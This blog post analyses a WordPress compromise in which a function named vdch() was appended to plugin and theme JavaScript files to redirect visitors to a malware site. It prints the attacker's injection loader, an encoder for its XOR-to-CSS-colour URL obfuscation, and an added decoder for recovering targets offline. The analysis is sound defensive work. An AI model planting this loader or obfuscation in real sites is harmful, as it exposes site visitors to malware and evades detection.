I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.
Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).
Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function appended to the end of the file: "function vdch()". Make sure your blogs are clean: a recursive grep for "vdch" over wp-content lists the affected files, since the function name is the one thing in the payload that is not obfuscated.
Update: As I just read in this forum, on Stack Overflow and on WordPress, they seem to compromise PHP and HTML files too. I guess in my case they couldn't, because the WordPress vulnerability they exploited only gives access to the built-in editor, which only lets you edit plugin and theme files.
This is the script they used on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome; it relies on the non-standard document.all collection, which is the likely reason for the difference.
function vdch() {
    // wait until the DOM has at least four elements, then inject into document.all[3]
    if(document.all.length > 3) {
        var t = new Array(...);   // the target URL, stored as a list of "#rrggbb" colour strings
        var dchid = "";
        for (j=0;j<t.length;j++) {
            var c_rgb = t[j];
            // read the hex pairs at offsets 1, 3, 5 of "#rrggbb"; the i++ inside substr()
            // steps i so the pairs are XORed with 2, 4 and 6 respectively
            for (i=1;i<7;i++) {
                var c_clr = c_rgb.substr(i++,2);
                if (c_clr!="00") dchid += String.fromCharCode(   // "00" pairs are padding
                    parseInt(c_clr,16)^i);
            }
        }
        // load the decoded URL as an external script (this is the redirect)
        var dch = document.createElement("script");
        dch.id = "dchid";
        dch.src = dchid;
        document.all[3].appendChild(dch);
    } else {
        setTimeout("vdch()",500);   // retry every 500 ms until the DOM is ready
    }
} setTimeout("vdch()",500);
Update 2: I was curious about how the string (=URL) encoding works in the script above. It is not encryption, just a XOR with 2, 4 and 6 that turns every three characters of the URL into something that looks like a CSS colour ("#rrggbb"), so the target host never appears in clear text and a grep for it finds nothing. Here's the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).
var url = "http://your.url/";
var enc = new Array();
var rgb = "#";
var i, j;
for (i = 0, j = 2; i < url.length; i++, j += 2) {
    // hex of (char XOR 2|4|6), padded to two digits so the decoder's fixed-width substr() stays aligned
    var hex = (url.charCodeAt(i) ^ j).toString(16);
    rgb += (hex.length < 2 ? "0" : "") + hex;
    if (j == 6) {
        j = 0;
        enc.push(rgb);
        rgb = "#";
    }
}
// flush a trailing partial group, padded with "00" (the decoder skips "00" pairs);
// without this the last one or two characters of the URL were silently dropped
if (rgb.length > 1) {
    while (rgb.length < 7) rgb += "00";
    enc.push(rgb);
}
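As an added example (my own code, not the snippet from the post or the attacker's script), here is the encoder and the matching decoder side by side, plus a small helper that pulls the colour array out of a captured infected file and decodes it, so the redirect target can be recovered offline without ever running the malware. The target URL and the infected-script text used below are made up for the example, not real indicators.

```javascript
// Added example: encoder/decoder pair for the "#rrggbb" XOR obfuscation used by
// the vdch() dropper, plus an offline decoder for incident response.
// All URLs and the sample script below are constructed for this example.

// Encode an ASCII URL as an array of fake CSS colours. Each colour carries three
// characters: character k of the group (k = 0, 1, 2) is XORed with 2, 4 or 6 and
// written as two hex digits. The last group is padded with "00", which the
// decoder treats as "skip" (URLs never contain the bytes 0x02/0x04/0x06 that
// would XOR to 0x00, so padding cannot collide with real data).
function encodeAsColours(url) {
  var colours = [];
  for (var pos = 0; pos < url.length; pos += 3) {
    var rgb = "#";
    for (var k = 0; k < 3; k++) {
      if (pos + k < url.length) {
        var code = url.charCodeAt(pos + k);
        if (code > 255) throw new Error("ASCII/Latin-1 input only");
        var hex = (code ^ (2 * (k + 1))).toString(16);
        rgb += (hex.length < 2 ? "0" : "") + hex;   // keep a fixed width of two digits
      } else {
        rgb += "00";                                 // padding
      }
    }
    colours.push(rgb);
  }
  return colours;
}

// Decode an array of "#rrggbb" strings back to the URL. This mirrors the loop
// in vdch(): hex pairs at offsets 1, 3, 5 XORed with 2, 4, 6; "00" is skipped.
function decodeColours(colours) {
  var out = "";
  for (var n = 0; n < colours.length; n++) {
    var rgb = colours[n];
    for (var k = 0; k < 3; k++) {
      var pair = rgb.substr(1 + 2 * k, 2);
      if (pair !== "00") {
        out += String.fromCharCode(parseInt(pair, 16) ^ (2 * (k + 1)));
      }
    }
  }
  return out;
}

// Incident-response helper: given the text of an infected .js file, find the
// colour array inside vdch() and decode it. Returns null if nothing is found.
function recoverTargetFromScript(scriptText) {
  var match = scriptText.match(/new\s+Array\s*\(([^)]*)\)/);
  if (!match) return null;
  var colours = match[1].match(/#[0-9a-fA-F]{6}/g);
  if (!colours) return null;
  return decodeColours(colours);
}

// Constructed sample: a made-up target and a minimal infected script built from it.
var sampleTarget = "http://example.invalid/go.js";
var sampleScript = "function vdch(){var t=new Array(" +
  encodeAsColours(sampleTarget).map(function (c) { return '"' + c + '"'; }).join(",") +
  ");}";

// Usage: paste the contents of a cleaned-up copy of the infected file into
// recoverTargetFromScript() and log the result.
console.log(encodeAsColours(sampleTarget));
console.log(recoverTargetFromScript(sampleScript));
```

The decoder deliberately mirrors the malware's loop rather than the encoder, so it also works on colour arrays taken from the wild; feeding it the array from an infected file gives you the redirect host to block and to search the logs for.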